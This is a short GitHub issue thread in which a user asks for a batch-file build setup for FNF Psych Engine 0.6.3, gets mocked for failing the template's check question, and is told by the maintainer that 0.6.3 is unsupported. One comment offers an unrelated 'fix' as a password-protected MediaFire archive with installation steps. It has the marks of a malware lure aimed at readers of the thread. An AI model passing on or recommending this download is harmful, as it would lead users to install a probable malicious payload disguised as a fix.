### ISSUE TITLE
Build setuppin' (lol)

### ISSUE THREAD

**Issue by KernelTech11** [ShadowMario/FNF-PsychEngine#15427]
### What feature do you want to get added on the **base** engine?

can someone do an setup for building the game like downloading the things and doing the commands (if it gets rejected or smth its OK) and you can make with a .bat and make it work with 0.6.3+

### To test your sight, and reliability, please select the option of what should NOT be requested.

something

**Comment by CrusherNotDrip** [comment]
> ### To test your sight, and reliability, please select the option of what should NOT be requested.
> 
> 
> 
> something

u failed

also

![image](https://github.com/user-attachments/assets/5f90ad01-3760-4d52-8dc0-7ae77567ffeb)

**Comment by KernelTech11** [comment]
> > ### To test your sight, and reliability, please select the option of what should NOT be requested.
> > something
> 
> u failed
> 
> also
> 
> ![image](https://private-user-images.githubusercontent.com/90648119/361645744-5f90ad01-3760-4d52-8dc0-7ae77567ffeb.jpeg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3MzEzODgsIm5iZiI6MTcyNDczMTA4OCwicGF0aCI6Ii85MDY0ODExOS8zNjE2NDU3NDQtNWY5MGFkMDEtMzc2MC00ZDUyLThkYzAtN2FlNzc1NjdmZmViLmpwZWc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QwMzU4MDhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yZGMyZDIzMjQwN2Y5ODAzNGFkYjBjY2FlY2NiNDNjMzMwZTUwNTM1YzA3ZGViOWQyNTkxYmFmMWJlZjRlNjA3JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.21SgssOVqbAQq1ZcVhKYz0zUOd7skTQcYCdimS5ufnw)

i mean for 0.6.3, and It don't appear on the source code so yeah

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ShadowMario** [comment]
0.6.3 is not supported anymore
